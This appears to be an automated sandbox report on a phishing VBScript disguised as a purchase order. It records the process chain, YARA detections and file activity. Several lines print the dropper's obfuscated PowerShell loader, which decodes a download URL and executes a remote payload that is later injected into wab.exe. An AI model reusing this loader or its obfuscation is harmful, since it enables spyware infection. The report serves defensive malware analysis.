Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F4CED6	2_2_00007FF848F4CED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F4DC82	2_2_00007FF848F4DC82
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000EE58D	8_2_000EE58D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000EAA3A	8_2_000EAA3A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000E4A98	8_2_000E4A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000E3E80	8_2_000E3E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_000E41C8	8_2_000E41C8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Texas_Tool_Purchase_Order#T18834-1.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi64_3012.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_344.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3012, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 344, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@12/7@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Myxogaster.Opv

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i555qyuf.ryg.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3012
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=344
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Texas_Tool_Purchase_Order#T18834-1.vbs	ReversingLabs: Detection: 26%
Source: Texas_Tool_Purchase_Order#T18834-1.vbs	Virustotal: Detection: 30%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
